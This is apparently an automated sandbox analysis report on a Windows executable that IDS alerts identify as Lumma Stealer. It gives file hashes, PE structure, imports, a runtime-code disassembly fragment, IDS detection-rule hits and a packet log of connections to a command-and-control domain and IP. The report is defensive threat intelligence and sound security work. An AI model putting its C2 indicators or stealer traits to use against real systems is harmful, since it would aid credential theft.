                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.8.8.<./.P.i.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA8A.tmp.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4579
                                                                      Entropy (8bit):4.466680029337036
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zsCJg77aI9e+SWpW8VYf8Ym8M4J+UFf+q8gn7G0Eldkd:uIjfQI7og7VAJV1G0+dkd
                                                                      MD5:9FC7A32DB40DB728741F8D41945887E6
                                                                      SHA1:8F319BD0F7AAED009F62C95F1002449783457A83
                                                                      SHA-256:9ABA85E4CF62BF9CFAD2A7812CABAAB5724A64387471FE7D009B20CA46C5D1D3
                                                                      SHA-512:C1E94EF45B3D77EC610D1E6725A2FFB31882DBCBC680ACAF793C84AF0848B1A99EA5A199121FC21D1999DE849467251F6151B59ED94991A7D8B49A437868B2DC
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="285034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.465450101094752
                                                                      Encrypted:false
                                                                      SSDEEP:6144:3IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNWdwBCswSbzW:4XD94+WlLZMM6YFH8+zW
                                                                      MD5:628B8A0D5CFC5EA937EE4763253DAA39
                                                                      SHA1:CAA92D570FED0788C0ED65712506916157D83494
                                                                      SHA-256:C4ADC5AEE31273071E4722CD3AB5677A1DD47CFDF21E4774C59553BF53363E4A
                                                                      SHA-512:3EFCEAAC56BDAE5BFE9E3BD83944D779AEC604A4713CA5B53BFF187CF450DC8B5FDCA6C50E252B20937584DE45FF837C4F38FDEFDB06C383681CF00AEE9E1ED0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb/.b................................................................................................................................................................................................................................................................................................................................................$..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.450237567520108
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:5Dw2hTQmiB.exe
                                                                      File size:368'640 bytes
                                                                      MD5:017adc7dfb6b77dd2c14f7f7a4933f1c
                                                                      SHA1:1038aa153bfc7e29ffea56b13f24e6f98d7413d2
                                                                      SHA256:b2f99dd2c6fa0d0321832ac217f6a9842b4b27f3dbfff993547ba2c593573fba
                                                                      SHA512:591befa41de309c931e95c06ed1567cfe4dd4a2d4c340af20815f9255a2ccbb27401884cd72dd434c59c5b4a2b57d864f8298b871468adccf54b21771b3f187e
                                                                      SSDEEP:6144:mL755LpGJb1tny2qvdbgq/1aQQ826Tgtvbgi6GmKEaYTi:m5W1gwYg16U
                                                                      TLSH:FB74E0E07EA0D435D15A8770BD29E6A81A2EBC71DAB5C1773764275E0E30290E63237F
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^......D...D...D..7D...D..!D~..D..&D3..D=w.D...D...Dk..D..(D...D..6D...D..3D...DRich...D................PE..L...I..d...........

                                                                      File Icon

                                                                      Icon Hash:67376767c3771667

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x401869
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x64BCBF49 [Sun Jul 23 05:48:57 2023 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:96d5e40a6f183914c8bf0374fa1144d1

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      call 00007F44948FC424h
                                                                      jmp 00007F44948F7CFEh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      mov ecx, dword ptr [esp+04h]
                                                                      test ecx, 00000003h
                                                                      je 00007F44948F7EA6h
                                                                      mov al, byte ptr [ecx]
                                                                      add ecx, 01h
                                                                      test al, al
                                                                      je 00007F44948F7ED0h
                                                                      test ecx, 00000003h
                                                                      jne 00007F44948F7E71h
                                                                      add eax, 00000000h
                                                                      lea esp, dword ptr [esp+00000000h]
                                                                      lea esp, dword ptr [esp+00000000h]
                                                                      mov eax, dword ptr [ecx]
                                                                      mov edx, 7EFEFEFFh
                                                                      add edx, eax
                                                                      xor eax, FFFFFFFFh
                                                                      xor eax, edx
                                                                      add ecx, 04h
                                                                      test eax, 81010100h
                                                                      je 00007F44948F7E6Ah
                                                                      mov eax, dword ptr [ecx-04h]
                                                                      test al, al
                                                                      je 00007F44948F7EB4h
                                                                      test ah, ah
                                                                      je 00007F44948F7EA6h
                                                                      test eax, 00FF0000h
                                                                      je 00007F44948F7E95h
                                                                      test eax, FF000000h
                                                                      je 00007F44948F7E84h
                                                                      jmp 00007F44948F7E4Fh
                                                                      lea eax, dword ptr [ecx-01h]
                                                                      mov ecx, dword ptr [esp+04h]
                                                                      sub eax, ecx
                                                                      ret
                                                                      lea eax, dword ptr [ecx-02h]
                                                                      mov ecx, dword ptr [esp+04h]
                                                                      sub eax, ecx
                                                                      ret
                                                                      lea eax, dword ptr [ecx-03h]
                                                                      mov ecx, dword ptr [esp+04h]
                                                                      sub eax, ecx
                                                                      ret
                                                                      lea eax, dword ptr [ecx-04h]
                                                                      mov ecx, dword ptr [esp+04h]
                                                                      sub eax, ecx
                                                                      ret
                                                                      mov edi, edi
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 20h
                                                                      mov eax, dword ptr [ebp+08h]
                                                                      push esi
                                                                      push edi
                                                                      push 00000008h
                                                                      pop ecx
                                                                      mov esi, 0040C204h
                                                                      lea edi, dword ptr [ebp-20h]
                                                                      rep movsd
                                                                      mov dword ptr [ebp-08h], eax
                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                      pop edi
                                                                      mov dword ptr [ebp-04h], eax
                                                                      pop esi

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ASM] VS2008 build 21022
                                                                      • [ C ] VS2008 build 21022
                                                                      • [C++] VS2008 build 21022
                                                                      • [IMP] VS2005 build 50727
                                                                      • [RES] VS2008 build 21022
                                                                      • [LNK] VS2008 build 21022

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4a94c0x28.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x282f0000xda38.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xc0000x188.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000xa3bd0xa4003f185b8c05939e71318b1e929175bce0False0.6194979039634146data6.577575934437442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0xc0000x3f22c0x3f4008d1c30862dcec887de678b323ff1ffcaFalse0.6987671380928854data6.511816528649135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x4c0000x27e23e00x2800ca2debe8a9f46f406344c0157ef539f8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x282f0000xda380xdc003c37d4933d2289bb16215f68ab580a9fFalse0.5068892045454545data5.354618519082868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      BUCEJEZAPOCOWUVOY0x283b5380x476ASCII text, with very long lines (1142), with no line terminatorsTurkishTurkey0.6243432574430823
                                                                      RT_ICON0x282f5800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.43789978678038377
                                                                      RT_ICON0x28304280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5735559566787004
                                                                      RT_ICON0x2830cd00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6422811059907834
                                                                      RT_ICON0x28313980x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6842485549132948
                                                                      RT_ICON0x28319000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.5378630705394191
                                                                      RT_ICON0x2833ea80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.6110655737704918
                                                                      RT_ICON0x28348300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.6453900709219859
                                                                      RT_ICON0x2834d000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.44163113006396587
                                                                      RT_ICON0x2835ba80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5699458483754513
                                                                      RT_ICON0x28364500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6071428571428571
                                                                      RT_ICON0x2836b180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.6755780346820809
                                                                      RT_ICON0x28370800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3938796680497925
                                                                      RT_ICON0x28396280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.4303470919324578
                                                                      RT_ICON0x283a6d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.45368852459016396
                                                                      RT_ICON0x283b0580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.4521276595744681
                                                                      RT_STRING0x283bbb80x182data0.4948186528497409
                                                                      RT_STRING0x283bd400x5c2data0.4369063772048847
                                                                      RT_STRING0x283c3080x13edata0.5062893081761006
                                                                      RT_STRING0x283c4480x576data0.44778254649499283
                                                                      RT_STRING0x283c9c00x78data0.6833333333333333
                                                                      RT_ACCELERATOR0x283b9b00x28data1.0
                                                                      RT_GROUP_ICON0x2834c980x68dataTurkishTurkey0.7115384615384616
                                                                      RT_GROUP_ICON0x283b4c00x76dataTurkishTurkey0.6779661016949152
                                                                      RT_VERSION0x283b9d80x1e0data0.5729166666666666

                                                                      Imports

                                                                      DLLImport
                                                                      KERNEL32.dllGetDateFormatW, GetConsoleAliasesLengthW, GetLocaleInfoA, GetConsoleAliasExesLengthA, EnumCalendarInfoW, SetDefaultCommConfigW, SetFirmwareEnvironmentVariableA, GetComputerNameW, LockFile, FreeEnvironmentStringsA, GetModuleHandleW, IsBadReadPtr, EnumTimeFormatsA, SetCommState, GlobalAlloc, LoadLibraryW, FindNextVolumeW, GetAtomNameW, SetConsoleTitleA, GetProcAddress, GetProcessHeaps, CreateNamedPipeA, GetConsoleDisplayMode, BuildCommDCBW, LoadLibraryA, SetCurrentDirectoryW, WaitForMultipleObjects, GetModuleFileNameA, BuildCommDCBA, VirtualProtect, GetCurrentDirectoryA, SetCalendarInfoA, FindAtomW, LocalFileTimeToFileTime, GetLastError, HeapReAlloc, HeapAlloc, GetStartupInfoW, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, VirtualAlloc, WriteFile, GetStdHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, WideCharToMultiByte, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, LCMapStringA, LCMapStringW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      TurkishTurkey

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      04/18/24-09:32:11.120979TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49733443192.168.2.4104.21.44.10
                                                                      04/18/24-09:32:12.067364TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49734443192.168.2.4104.21.44.10
                                                                      04/18/24-09:32:15.106009TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49737443192.168.2.4104.21.44.10
                                                                      04/18/24-09:32:09.305940TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49731443192.168.2.4104.21.44.10
                                                                      04/18/24-09:32:08.210974UDP2052048ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (exceptionwillapews .shop)6051253192.168.2.41.1.1.1
                                                                      04/18/24-09:32:12.955304TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49735443192.168.2.4104.21.44.10
                                                                      04/18/24-09:32:13.747309TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49736443192.168.2.4104.21.44.10
                                                                      04/18/24-09:32:10.239652TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49732443192.168.2.4104.21.44.10
                                                                      04/18/24-09:32:08.516255TCP2052049ET TROJAN Observed Lumma Stealer Related Domain (exceptionwillapews .shop in TLS SNI)49730443192.168.2.4104.21.44.10

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 18, 2024 09:32:08.368251085 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.368303061 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:08.368421078 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.516254902 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.516324043 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:08.773271084 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:08.773354053 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.777960062 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.777973890 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:08.778474092 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:08.825519085 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.856029034 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.856064081 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:08.856496096 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.298695087 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.298813105 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.299016953 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.301043987 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.301076889 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.301107883 CEST49730443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.301124096 CEST44349730104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.305552959 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.305598974 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.305682898 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.305939913 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.305960894 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.552851915 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.552983999 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.554116964 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.554140091 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.554630995 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:09.555768013 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.555808067 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:09.555882931 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099344015 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099390984 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099428892 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099492073 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099522114 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099543095 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099567890 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.099567890 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.099601030 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099617004 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.099872112 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099900961 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.099922895 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.099931002 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.100003004 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.100387096 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.100483894 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.100521088 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.100549936 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.100555897 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.100569963 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.100608110 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.101427078 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.101517916 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.101625919 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.101641893 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.101672888 CEST49731443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.101679087 CEST44349731104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.238833904 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.238920927 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.238997936 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.239651918 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.239686012 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.483084917 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.483166933 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.484668016 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.484678984 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.484998941 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.486361027 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.486517906 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.486547947 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:10.486613035 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:10.486620903 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.008991003 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.009274006 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.009366035 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.010610104 CEST49732443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.010663986 CEST44349732104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.120501041 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.120548010 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.120650053 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.120979071 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.120992899 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.359489918 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.359679937 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.361378908 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.361390114 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.361619949 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.362946987 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.363102913 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.363122940 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.871042967 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.871157885 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:11.871258020 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.871440887 CEST49733443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:11.871458054 CEST44349733104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.066638947 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.066734076 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.066855907 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.067363977 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.067399979 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.309534073 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.309817076 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.311247110 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.311275959 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.311585903 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.312913895 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.313075066 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.313113928 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.313210964 CEST49734443192.168.2.4104.21.44.10
                                                                      Apr 18, 2024 09:32:12.313231945 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.840702057 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.840791941 CEST44349734104.21.44.10192.168.2.4
                                                                      Apr 18, 2024 09:32:12.840876102 CEST49734443192.168.2.4104.21.44.10
